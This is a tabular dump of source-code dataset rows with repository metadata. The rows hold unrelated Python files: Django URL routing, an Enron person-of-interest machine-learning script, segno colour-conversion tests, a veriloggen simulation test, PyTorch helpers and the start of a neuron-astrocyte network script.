blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2e17765330e011bed1c2dfc615cd74fc673c461d | 6ebee3511ad3ce131341e0a37d04a66f86d0c1fc | /comments/urls.py | 6dc6dd4a2faf8d3c1217de8876b07ea5a72fd611 | [] | no_license | annfr542/ratemyshogun | 25b18d6aaadd7a60f3e25f6cb5709796241a1732 | b2785f16e85175f090724ca6e59512aef5d0ccf0 | refs/heads/master | 2021-01-03T07:47:11.516448 | 2020-02-17T13:15:42 | 2020-02-17T13:15:42 | 239,987,405 | 0 | 0 | null | 2020-02-17T00:04:52 | 2020-02-12T10:39:04 | HTML | UTF-8 | Python | false | false | 280 | py | from django.urls import include, path
from rest_framework import routers
from . import views
router = routers.DefaultRouter()
router.register(r'comments', views.CommentViewSet)
router.register(r'love', views.LoveViewSet)
urlpatterns = [
path('', include(router.urls)),
] | [
"git@karlinde.se"
] | git@karlinde.se |
0fd3b3241fcb8a7a9539c91b1e00d1ca84cd191b | e9a33e068f1a60fcef86e1f90eda2f64b52e73c4 | /poi_id.py | eaf912e63defaae9d5f26cc091f5909a62c9c56d | [] | no_license | Tbelaagcakn/Udacity_P7 | b5df34dd20df6220e76dd774df0d5888094d646d | b923c48a5a429463d2841ef94a0202bde97606d7 | refs/heads/master | 2020-03-23T23:06:05.317127 | 2018-07-24T22:01:17 | 2018-07-24T22:01:17 | 142,215,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,606 | py | #!/usr/bin/python
# importer functions
import sys
import pickle
import numpy as np
from sklearn import linear_model
from sklearn import tree
from sklearn.cross_validation import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score, recall_score, precision_score
from sklearn.model_selection import StratifiedShuffleSplit
import matplotlib.pyplot as plt
from sklearn.preprocessing import MinMaxScaler
from sklearn import cross_validation
from sklearn.feature_selection import SelectKBest, f_classif, chi2
from collections import OrderedDict
### HELPER functions
# functions that help to clean and format the code
def dump_classifier_and_data(clf, dataset, feature_list):
CLF_PICKLE_FILENAME = "my_classifier.pkl"
DATASET_PICKLE_FILENAME = "my_dataset.pkl"
FEATURE_LIST_FILENAME = "my_feature_list.pkl"
with open(CLF_PICKLE_FILENAME, "w") as clf_outfile:
pickle.dump(clf, clf_outfile)
with open(DATASET_PICKLE_FILENAME, "w") as dataset_outfile:
pickle.dump(dataset, dataset_outfile)
with open(FEATURE_LIST_FILENAME, "w") as featurelist_outfile:
pickle.dump(feature_list, featurelist_outfile)
def outlierCleaner(predictions, ages, net_worths):
"""
Clean away the 3% of points that have the largest
residual errors (difference between the prediction
and the actual net worth).
Return a list of tuples named cleaned_data where
each tuple is of the form (age, net_worth, error).
"""
mypred = [p[0] for p in predictions]
myages = [p[0] for p in ages]
myNW = [p[0] for p in net_worths]
err = []
err_sq = []
for i in range(len(mypred)):
error = myNW[i] - mypred[i]
error_sq = error * error
err.append(error)
err_sq.append(error_sq)
master_list = zip(err_sq,myages,myNW,err)
sort_master_list = sorted(master_list, key=lambda t: t[0])
myList = sort_master_list[: int(round(0.97 * len(sort_master_list)))]
cleaned_data = [(t[1], t[2], t[3]) for t in myList]
return cleaned_data
"""
A general tool for converting data from the
dictionary format to an (n x k) python list that's
ready for training an sklearn algorithm
n--no. of key-value pairs in dictonary
k--no. of features being extracted
dictionary keys are names of persons in dataset
dictionary values are dictionaries, where each
key-value pair in the dict is the name
of a feature, and its value for that person
In addition to converting a dictionary to a numpy
array, you may want to separate the labels from the
features--this is what targetFeatureSplit is for
so, if you want to have the poi label as the target,
and the features you want to use are the person's
salary and bonus, here's what you would do:
feature_list = ["poi", "salary", "bonus"]
data_array = featureFormat( data_dictionary, feature_list )
label, features = targetFeatureSplit(data_array)
the line above (targetFeatureSplit) assumes that the
label is the _first_ item in feature_list--very important
that poi is listed first!
"""
def featureFormat( dictionary, features, remove_NaN=True, remove_all_zeroes=True, remove_any_zeroes=False, sort_keys = False):
""" convert dictionary to numpy array of features
remove_NaN = True will convert "NaN" string to 0.0
remove_all_zeroes = True will omit any data points for which
all the features you seek are 0.0
remove_any_zeroes = True will omit any data points for which
any of the features you seek are 0.0
sort_keys = True sorts keys by alphabetical order. Setting the value as
a string opens the corresponding pickle file with a preset key
order (this is used for Python 3 compatibility, and sort_keys
should be left as False for the course mini-projects).
NOTE: first feature is assumed to be 'poi' and is not checked for
removal for zero or missing values.
"""
return_list = []
# Key order - first branch is for Python 3 compatibility on mini-projects,
# second branch is for compatibility on final project.
if isinstance(sort_keys, str):
import pickle
keys = pickle.load(open(sort_keys, "rb"))
elif sort_keys:
keys = sorted(dictionary.keys())
else:
keys = dictionary.keys()
#print(keys)
for key in keys:
tmp_list = []
for feature in features:
try:
dictionary[key][feature]
except KeyError:
print( "error: key ", feature, " not present")
return
value = dictionary[key][feature]
if value=="NaN" and remove_NaN:
value = 0
tmp_list.append( float(value) )
# Logic for deciding whether or not to add the data point.
append = True
# exclude 'poi' class as criteria.
if features[0] == 'poi':
test_list = tmp_list[1:]
else:
test_list = tmp_list
### if all features are zero and you want to remove
### data points that are all zero, do that here
if remove_all_zeroes:
append = False
for item in test_list:
if item != 0 and item != "NaN":
append = True
break
### if any features for a given data point are zero
### and you want to remove data points with any zeroes,
### handle that here
if remove_any_zeroes:
if 0 in test_list or "NaN" in test_list:
append = False
### Append the data point if flagged for addition.
if append:
return_list.append( np.array(tmp_list) )
return np.array(return_list)
def targetFeatureSplit( data ):
"""
given a numpy array like the one returned from
featureFormat, separate out the first feature
and put it into its own list (this should be the
quantity you want to predict)
return targets and features as separate lists
(sklearn can generally handle both lists and numpy arrays as
input formats when training/predicting)
"""
target = []
features = []
for item in data:
target.append( item[0] )
features.append( item[1:] )
return target, features
### Task 1: Select what features you'll use.
### features_list is a list of strings, each of which is a feature name.
### The first feature must be "poi".
#this is the initial list of data to explore (not final!)
features_list = ['poi','salary','bonus','exercised_stock_options','from_messages','from_poi_to_this_person',
'from_this_person_to_poi','deferred_income'] # You will need to use more features
### Load the dictionary containing the dataset
with open("final_project_dataset.pkl", "r",) as data_file:
data_dict = pickle.load(data_file)
# Take out total option (from outlier section below)
data_dict.pop('TOTAL')
# Create lists for use in basic analysis
names, Salary, Bonus, ESO, FEmails, FromPOI, POI, DefInc = [], [], [], [], [], [], [], []
count_nan, count_all = 0, 0
#counting the total data points, POI and number of NaNs
for person, data in data_dict.iteritems():
names.append(person)
for key, value in data.iteritems():
count_all += 1
if value == 'NaN':
count_nan = count_nan + 1
for name in names:
POI.append(int(data_dict[name]['poi']))
Salary.append(float(data_dict[name]['salary']))
Bonus.append(float(data_dict[name]['bonus']))
ESO.append(float(data_dict[name]['exercised_stock_options']))
DefInc.append(float(data_dict[name]['deferred_income']))
FromPOI.append(float(data_dict[name]['from_poi_to_this_person']))
FEmails.append(float(data_dict[name]['from_messages']))
print 'Total People: ' + str(len(names))
print 'Total POI: ' + str(sum(POI))
print 'Total Data Points: ' + str(count_all)
print 'Total NaN: ' + str(count_nan)
### Task 2: Remove outliers
# first look at the data we have and where the POIs are to see if there
#are any obvious outliers (for eg TOTAL)
plt.scatter(Salary, Bonus, color='green')
for i, value in enumerate(POI):
if POI[i] ==1:
plt.scatter(Salary[i], Bonus[i], color = 'red')
plt.show()
plt.scatter(FEmails, FromPOI, color='green')
for i, value in enumerate(POI):
if POI[i] ==1:
plt.scatter(FEmails[i], FromPOI[i], color = 'red')
plt.show()
#shape data for linear regression model for testing if removing outliers is effective
eso = np.nan_to_num(np.reshape((np.array(ESO)), (len(ESO), 1)))
poi = np.nan_to_num(np.reshape((np.array(Salary)), (len(Salary), 1)))
eso_train, eso_test, poi_train, poi_test = train_test_split(eso, poi, test_size=0.2, random_state=15)
reg = linear_model.LinearRegression()
reg.fit(eso_train, poi_train)
print('Regression Score Pre-Clean: ' + str(reg.score(eso_test, poi_test)))
try:
plt.plot(eso, reg.predict(eso), color="blue")
except NameError:
pass
plt.scatter(eso, poi)
plt.show()
### identify and remove the most outlier-y points
cleaned_data = []
try:
predictions = reg.predict(eso_train)
cleaned_data = outlierCleaner( predictions, eso_train, poi_train )
except NameError:
print( "your regression object doesn't exist, or isn't name reg")
print( "can't make predictions to use in identifying outliers")
### only run this code if cleaned_data is returning data
if len(cleaned_data) > 0:
eso, poi, errors = zip(*cleaned_data)
eso = np.reshape( np.array(eso), (len(eso), 1))
poi = np.reshape( np.array(poi), (len(poi), 1))
### refit your cleaned data!
try:
reg.fit(eso, poi)
print 'Regression Score Post Clean: ' + str(reg.score(eso_test, poi_test))
plt.plot(eso, reg.predict(eso), color="blue")
except NameError:
print( "you don't seem to have regression imported/created")
print( " or else your regression object isn't named reg")
print( " either way, only draw the scatter plot of the cleaned data")
plt.scatter(eso, poi)
plt.xlabel("eso")
plt.ylabel("poi")
#plt.show()
else:
print( "outlierCleaner() is returning an empty list, no refitting to be done")
### Task 3: Create new feature(s)
### Store to my_dataset for easy export below.
# create np arrays for the rescaler
salary = np.nan_to_num(np.reshape((np.array(Salary)), (len(Salary), 1)))
bonus = np.nan_to_num(np.reshape((np.array(Bonus)), (len(Bonus), 1)))
eso = np.nan_to_num(np.reshape((np.array(ESO)), (len(ESO), 1)))
#rescale salary, bonus and exercised sti=ock options
scaler = MinMaxScaler()
scaled = scaler.fit(salary)
scaled_salary = scaled.transform(salary)
scaled = scaler.fit(bonus)
scaled_bonus = scaled.transform(bonus)
scaled = scaler.fit(eso)
scaled_eso = scaled.transform(eso)
#append data_dict with rescaled values and create new
#value for the percent of emails received from POI
count = 0
for name in names:
data_dict[name]['salary'] = scaled_salary[count][0]
data_dict[name]['bonus'] = scaled_bonus[count][0]
data_dict[name]['exercised_stock_options'] = scaled_eso[count][0]
count = count + 1
data_dict[name]['Percent_Emails_from_POI'] = float(data_dict[name]['from_poi_to_this_person'])/float(data_dict[name]['from_messages'])
features = ['poi','salary', 'deferral_payments', 'total_payments', 'loan_advances', 'bonus',
'restricted_stock_deferred', 'deferred_income', 'total_stock_value', 'expenses',
'exercised_stock_options', 'other', 'long_term_incentive', 'restricted_stock',
'director_fees','to_messages', 'from_poi_to_this_person', 'from_messages',
'from_this_person_to_poi', 'shared_receipt_with_poi']
data = featureFormat(data_dict, features)
# seperating the poi from rest of data
features_list = []
poi = []
for point in data:
poi.append(point[0])
features_list.append(point[1:])
# creating a split data set for use in selector - using train_test_split for simplicity
features_train, features_test, labels_train, labels_test = cross_validation.train_test_split(features_list, poi, test_size=0.3, random_state=42)
# Run selector to get a score of effect for each feature
selector = SelectKBest(f_classif, k=5)
selector.fit(features_train, labels_train)
features_train = selector.transform(features_train)
features_test = selector.transform(features_test)
# create a dictionary of the top scores
scores = selector.scores_
scores_dict = {}
scores_top_dict = {}
count = 0
for_using_features = []
for feature in features:
if feature == 'poi':
pass
else:
scores_dict[feature]=scores[count]
if scores[count] > 2:
scores_top_dict[feature] = scores[count]
for_using_features.append(feature)
count = count + 1
print(scores_top_dict)
# create new dataset with only the selected top features
new_data_dict = OrderedDict()
for person in data_dict:
names.append(person)
for name in names:
new_data_dict[name]=OrderedDict()
new_data_dict[name]['poi']=data_dict[name]['poi']
for feat in for_using_features:
new_data_dict[name][feat] = data_dict[name][feat]
my_dataset = new_data_dict
new_features_list = ['poi']
for feat in for_using_features:
new_features_list.append(feat)
### Extract features and labels from dataset for local testing
data = featureFormat(my_dataset, new_features_list, sort_keys = True)
labels, features = targetFeatureSplit(data)
features_train, features_test, labels_train, labels_test = cross_validation.train_test_split(features, labels, test_size=0.4, random_state=42)
### Task 4: Try a varity of classifiers
### Please name your classifier clf for easy export below.
### Note that if you want to do PCA or other multi-stage operations,
### you'll need to use Pipelines. For more info:
### http://scikit-learn.org/stable/modules/pipeline.html
#trying decision tree
clf = tree.DecisionTreeClassifier()
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'TREE RECALL:' + str(recall)
print 'TREE PRECISION:' + str(prec)
print 'DECISION TREE ACCURACY: ' + str(accuracy)
#trying random forest
clf = RandomForestClassifier()
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'RANDOM FOREST RECALL:' + str(recall)
print 'RANDOM FOREST PRECISION:' + str(prec)
print 'RANDOM FOREST ACCRAUCY:' + str(accuracy)
#trying SVM
clf = SVC()
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'SVM RECALL:' + str(recall)
print 'SVM PRECISION:' + str(prec)
print 'SVM ACCURACY: '+str(accuracy)
# Trying Naive Bayes
clf = GaussianNB()
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'Naive Bayes RECALL:' + str(recall)
print 'Naive Bayes PRECISION:' + str(prec)
print 'Naive Bayes ACCURACY: '+str(accuracy)
### Task 5: Tune your classifier to achieve better than .3 precision and recall
### using our testing script. Check the tester.py script in the final project
### folder for details on the evaluation method, especially the test_classifier
### function.
# I spent some time trying to tune the Random Forest Classifier before settling
#on the Guassian Naive Bayes so I have left the code here as an example of returning
#given the Guassian Naive Bayes did not require it
# Iteration 1 - I ran the code multiple times varying the n_estimators
clf = RandomForestClassifier(n_estimators=200)
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'RANDOM FOREST improved ACCRAUCY:' + str(accuracy)
print 'RANDOM FOREST improved RECALL:' + str(recall)
print 'RANDOM FOREST improved PRECISION:' + str(prec)
# Iteration 2
clf = RandomForestClassifier(criterion = 'entropy')
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'RANDOM FOREST improved ACCRAUCY:' + str(accuracy)
print 'RANDOM FOREST improved RECALL:' + str(recall)
print 'RANDOM FOREST improved PRECISION:' + str(prec)
# Iteration 3 - I ran the code multiple times varying the mmax_depth
clf = RandomForestClassifier(max_depth = 20)
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'RANDOM FOREST improved ACCRAUCY:' + str(accuracy)
print 'RANDOM FOREST improved RECALL:' + str(recall)
print 'RANDOM FOREST improved PRECISION:' + str(prec)
# Iteration 4 - I ran the code multiple times varying the min_samples_split
clf = RandomForestClassifier(min_samples_split = 4)
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'RANDOM FOREST improved ACCRAUCY:' + str(accuracy)
print 'RANDOM FOREST improved RECALL:' + str(recall)
print 'RANDOM FOREST improved PRECISION:' + str(prec)
# Iteration 5 - I ran the code multiple times with different combinations of the above parameters
clf = RandomForestClassifier(n_estimators = 1000, oob_score = True, random_state = 30)
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'RANDOM FOREST improved ACCRAUCY:' + str(accuracy)
print 'RANDOM FOREST RECALL:' + str(recall)
print 'RANDOM FOREST PRECISION:' + str(prec)
# Validation with Startified Shuffle Split
features_train, features_test, labels_train, labels_test = [],[],[],[]
sss = StratifiedShuffleSplit(n_splits = 3, test_size = 0.5, random_state = 15)
for train_indices, test_indices in sss.split(features, labels):
for i in train_indices:
features_train.append(features[i])
labels_train.append(labels[i])
for i in test_indices:
features_test.append(features[i])
labels_test.append(labels[i])
# final algorithm!
clf2 = GaussianNB()
clf2.fit(features_train, labels_train)
pred = clf2.predict(features_test)
accuracy = accuracy_score(pred, labels_test)
recall=recall_score(labels_test, pred)
prec = precision_score(labels_test, pred)
print 'GNB improved SSS ACCRAUCY:' + str(accuracy)
print 'GNB improved SSS RECALL:' + str(recall)
print 'GNB improved SSS PRECISION:' + str(prec)
### Task 6: Dump your classifier, dataset, and features_list so anyone can
### check your results. You do not need to change anything below, but make sure
### that the version of poi_id.py that you submit can be run on its own and
### generates the necessary .pkl files for validating your results.
dump_classifier_and_data(clf2, my_dataset, new_features_list)
| [
"butterworth.teagan@gmail.com"
] | butterworth.teagan@gmail.com |
c420d7a9fc7816087de4262d2731b0d42e2d9e96 | 770710253983911ea0ed00cb3111f2d3fbadd200 | /Functions/Notes.py | 9bfbd8381c561a79989c37f78497bfe0be88ee97 | [] | no_license | anshdholakia/Full-Voice-Assistant-Application | 4185ec88ed50f7477853bbf75905708dc3bb5c6d | c0b88aaece48c2aac4e159f5f7772e1df4c7dd1c | refs/heads/main | 2023-05-27T16:38:31.500721 | 2021-06-14T20:43:48 | 2021-06-14T20:43:48 | 376,944,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 113 | py | import subprocess as sp
programname = 'Notepad.exe'
filename = 'Mynotes.txt'
sp.Popen([programname,filename])
| [
"anshhiro.dholakia@gmail.com"
] | anshhiro.dholakia@gmail.com |
a0df9ac05e88fad95bd93a42f58be9a0d2994745 | 35b45b5225f911072287b7f0888f4ef4cc70f3d9 | /tests/test_colors.py | 4b316eecdba5bf03008b0ff14ef89c60f50cc7d2 | [
"BSD-3-Clause"
] | permissive | heuer/segno | 54e9b583dbc33b016715bb13f97a9013a37cc9d4 | 11556378fa8949fa5ad6dddbf8cc5f4a667038af | refs/heads/master | 2023-06-21T02:01:45.620206 | 2023-05-02T22:09:31 | 2023-05-02T22:09:31 | 64,920,252 | 441 | 59 | BSD-3-Clause | 2023-06-15T05:00:05 | 2016-08-04T09:08:52 | Python | UTF-8 | Python | false | false | 8,562 | py | # -*- coding: utf-8 -*-
#
# Copyright (c) 2016 - 2022 -- Lars Heuer
# All rights reserved.
#
# License: BSD License
#
"""\
Tests against the colors module.
"""
from __future__ import absolute_import, unicode_literals
import pytest
from segno import writers as colors
def test_illegal():
with pytest.raises(ValueError):
colors._color_to_rgb('unknown')
def test_illegal2():
with pytest.raises(ValueError):
colors._color_to_rgb((1, 2, 3, 256))
def test_illegal3():
with pytest.raises(ValueError):
colors._color_to_rgb((300, 300, 300))
def test_illegal4():
with pytest.raises(ValueError):
colors._color_to_rgb((0, 0, 256))
def test_illegal5():
with pytest.raises(ValueError):
colors._color_to_rgb((256, 0, 0))
def test_rgba_vs_rgb_conflict():
with pytest.raises(ValueError):
colors._color_to_rgb('#949494E8')
@pytest.mark.parametrize('clr, expected', [((0, 0, 0, 0), False),
((0, 0, 0, 1), True),
((0, 0, 0, 1.0), True),
((0, 0, 0, 255), True),
((0, 0, 0, 0.25), False),
('#000', True),
('#000000', True),
('Black', True),
('black', True),
('BLACK', True),
('blacK', True),
])
def test_color_is_black(clr, expected):
assert expected == colors._color_is_black(clr)
@pytest.mark.parametrize('clr, expected', (((255, 255, 255, 0), False),
((255, 255, 255, 1), True),
((255, 255, 255, 255), True),
((255, 255, 255, 1.0), True),
((255, 255, 255, .0), False),
((255, 255, 255, .25), False),
('#FFF', True),
('#fFF', True),
('#ffF', True),
('#fff', True),
('#ffffff', True),
('White', True),
('white', True),
('WHITE', True),
('whitE', True),
))
def test_color_is_white(clr, expected):
assert expected == colors._color_is_white(clr)
@pytest.mark.parametrize('clr, expected', (('black', '#000'),
('WHite', '#fff'),
('#000000', '#000'),
('#ffFFff', '#fff'),
('#EEeeEE', '#eee'),
('#F00', 'red'),
('#FF0000', 'red'),
('red', 'red'),
('#d2b48c', 'tan'),
('tan', 'tan'),
((0, 0, 0, 1.0), '#000'),
((255, 255, 255, 1.0), '#fff'),
((255, 0, 0, 0.25), 'rgba(255,0,0,0.25)'),
('#0000ffcc', 'rgba(0,0,255,0.8)'),
('#949494E8', 'rgba(148,148,148,0.91)'),
))
def test_color_to_webcolor(clr, expected):
assert expected == colors._color_to_webcolor(clr)
@pytest.mark.parametrize('clr, expected', (('black', '#000'),
('#F00', '#ff0000'),
('#FF0000', '#ff0000'),
('red', '#ff0000'),
('#D2B48C', '#d2b48c'),
((0, 0, 0, 1.0), '#000'),
((255, 255, 255, 1.0), '#fff'),
))
def test_color_to_webcolor_dont_optimize(clr, expected):
assert expected == colors._color_to_webcolor(clr, optimize=False)
def _make_valid_colornames_data():
data = (
('red', (255, 0, 0)),
('green', (0, 128, 0)),
('blue', (0, 0, 255)),
('Fuchsia', (255, 0, 255)),
('CoRnFloWeRblUe', (100, 149, 237)),
('hOtPink', (255, 105, 180)),
('darkSlateGrey', (47, 79, 79)),
)
for name, expected in data:
yield name, expected
yield name.title(), expected
yield name.upper(), expected
yield name.lower(), expected
@pytest.mark.parametrize('name, expected', _make_valid_colornames_data())
def test_valid_colornames(name, expected):
rgb = colors._color_to_rgb(name)
assert 3 == len(rgb)
assert expected == rgb
@pytest.mark.parametrize('color, expected', (('#fff', (255, 255, 255)),
('#0000ffcc', (0, 0, 255, .8)),
('#949494E8', (148, 148, 148, 0.91)),
))
def test_hex_to_rgba(color, expected):
assert expected == colors._hex_to_rgb_or_rgba(color)
@pytest.mark.parametrize('color, expected', (('#fff', (255, 255, 255)),
('#0000ffcc', (0, 0, 255, 204)),
('#949494E8', (148, 148, 148, 232)),
))
def test_hex_to_rgba_alpha_int(color, expected):
assert expected == colors._hex_to_rgb_or_rgba(color, alpha_float=False)
def _make_valid_hexcodes_rgb_data():
data = (
('#000', (0, 0, 0)),
('#FF1493', (255, 20, 147)),
('#FA8072', (250, 128, 114)),
('00F', (0, 0, 255)),
('#800000', (128, 0, 0)),
('#812dd3', (129, 45, 211)),
)
for name, expected in data:
yield name, expected
yield name.title(), expected
yield name.upper(), expected
yield name.lower(), expected
@pytest.mark.parametrize('name, expected', _make_valid_hexcodes_rgb_data())
def test_valid_hexcodes_rgb(name, expected):
rgb = colors._color_to_rgb(name)
assert 3 == len(rgb)
assert expected == rgb
def _make_valid_hexcodes_rgba_data():
data = (
('#808000', (128, 128, 0, 1.0)),
('red', (255, 0, 0, 1.0)),
)
for name, expected in data:
yield name, expected
yield name.title(), expected
yield name.upper(), expected
yield name.lower(), expected
@pytest.mark.parametrize('name, expected', _make_valid_hexcodes_rgba_data())
def test_valid_hexcodes_rgba(name, expected):
rgba = colors._color_to_rgba(name)
assert 4 == len(rgba)
assert expected == rgba
@pytest.mark.parametrize('t, expected', (
('#808000', (128, 128, 0, 1.0)),
('red', (255, 0, 0, 1.0)),
((255, 0, 0, .2), (255, 0, 0, .2)),
))
def test_tuple_to_rgba(t, expected):
rgba = colors._color_to_rgba(t)
assert expected == rgba
@pytest.mark.parametrize('t, expected', (
('#808000', (128, 128, 0, 255)),
('red', (255, 0, 0, 255)),
((0, 0, 255, .8), (0, 0, 255, 204)),
))
def test_tuple_to_rgba_int(t, expected):
rgba = colors._color_to_rgba(t, alpha_float=False)
assert expected == rgba
@pytest.mark.parametrize('color, expected', (
((0, 0, 0), (255, 255, 255)),
((255, 255, 255), (0, 0, 0)),
((123, 123, 123), (132, 132, 132)),
((60, 70, 80), (195, 185, 175)),
))
def test_invert_color(color, expected):
assert expected == colors._invert_color(color)
if __name__ == '__main__':
pytest.main([__file__])
| [
"heuer@semagia.com"
] | heuer@semagia.com |
1b90c28e59e5d4a5998f4d6c2027b2eacdd7467f | 1d9356626550004745bbc14de9a3308753afcea5 | /sample/tests/while/led.py | 2d6f9c7e92fa414d08993efca62d0115951efe0e | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | hoangt/veriloggen | e916290aa15c63f03ec0ad8e9c8bdf183787fbe9 | 8e7bd1ff664a6d683c3b7b31084ff4d961c4c841 | refs/heads/master | 2021-01-14T12:01:03.686270 | 2015-09-18T06:49:20 | 2015-09-18T06:49:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 806 | py | import sys
import os
from veriloggen import *
def mkTest():
m = Module('test')
clk = m.Reg('CLK')
rst = m.Reg('RST')
count = m.Reg('count', width=32)
m.Initial(
Systask('dumpfile', 'uut.vcd'),
Systask('dumpvars', 0, clk, rst, count),
)
m.Initial(
clk(0),
Forever(clk(Not(clk), ldelay=5)) # forever #5 CLK = ~CLK;
)
m.Initial(
rst(0),
Delay(100),
rst(1),
Delay(100),
rst(0),
Delay(1000),
count(0),
While(count < 1024)(
count( count + 1 ),
Event(Posedge(clk))
),
Systask('finish'),
)
return m
if __name__ == '__main__':
test = mkTest()
verilog = test.to_verilog('tmp.v')
print(verilog)
| [
"shta.ky1018@gmail.com"
] | shta.ky1018@gmail.com |
3233cf987d1529f760bef548e7a959952c37b30f | 98e1155518b292341e60908d12233a2b130cb043 | /helpers.py | cabba2a794108cc9b151778f12f403862f7ef99b | [] | no_license | bkj/pbtnet | 5443a580e1bca91e4c293ae2be8bdefb85a44ce0 | e8c7b11be92e5ff9e4facccf908e87611b7f72bb | refs/heads/master | 2021-05-02T13:49:50.894351 | 2018-02-08T03:48:25 | 2018-02-08T03:48:25 | 120,707,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | #!/usr/bin/env python
"""
helpers.py
"""
from __future__ import print_function, division
import numpy as np
import torch
from torch import nn
from torch.autograd import Variable
def to_numpy(x):
if isinstance(x, Variable):
return to_numpy(x.data)
return x.cpu().numpy() if x.is_cuda else x.numpy()
def set_seeds(seed):
np.random.seed(seed)
_ = torch.manual_seed(seed + 123)
_ = torch.cuda.manual_seed(seed + 456)
class Flatten(nn.Module):
def forward(self, x):
return x.view(x.shape[0], -1)
def ablate(x, p):
return x * Variable(torch.rand((1,) + x.shape[1:]).cuda() > p).float()
| [
"bkj.322@gmail.com"
] | bkj.322@gmail.com |
90cb117fe81c46994501a28739c375f1f067da8f | 256644d14bd15f8e1a3e92c95b1655fd36681399 | /backup/mypybrain/angn.py | 2f5f9b3be43027253373cedda5b32243ca76c87d | [] | no_license | mfbx9da4/neuron-astrocyte-networks | 9d1c0ff45951e45ce1f8297ec62b69ee4159305a | bcf933491bdb70031f8d9c859fc17e0622e5b126 | refs/heads/master | 2021-01-01T10:13:59.099090 | 2018-06-03T12:32:13 | 2018-06-03T12:32:13 | 12,457,305 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,739 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 14 17:48:37 2013
The activation function was the hyperbolic tangent in all the
layers, except in the output layer where the threshold function was
used with a threshold value of 0.5 and an expected binary output.
All layers have astrocytes
Weight limiting? Decision of neurons will never change
Modification of weights - input or output weights? Potential implied
method:
* Input astrocytes modify output weights
* Hidden astrocytes modify both input and output weights
* Output astrocytes modify input weights
associated neuronal connections were active for at least n out of m
iterations (n: 2 to 3; m: 4, 6, 8), and 2) considering the time unit as
a single iteration, astrocytic effects lasted 4 to 8 iterations, and the
neuronal connection weights gradually increased (25%) or
decreased (50%) if the associated astrocyte was active or inactive,
respectively.
The combinations (Astrocytic Sensitivity, Neuron-glia power
connection: 2,4; 3,6; 2,6 y 3,8) were determined by trial-and-error,
and allowed an upper limit of 3, 4, 5 or 6 astrocytic activations,
respectively.
@author: david
"""
import random
import datetime
import os
from pybrain.datasets import ClassificationDataSet
from pybrain.utilities import percentError
from pybrain.supervised.trainers import BackpropTrainer
from pybrain.structure import TanhLayer
from pybrain.tools.shortcuts import buildNetwork
from numpy import array, ones, zeros, append
import numpy as np
from astrocyte_layer import AstrocyteLayer
from plotting.plotters import plotPercentageErrorBar, plotPercentageNoErrorBar
from mymodules.threshold import ThresholdLayer
def createDS():
# taken from iris data set at machine learning repository
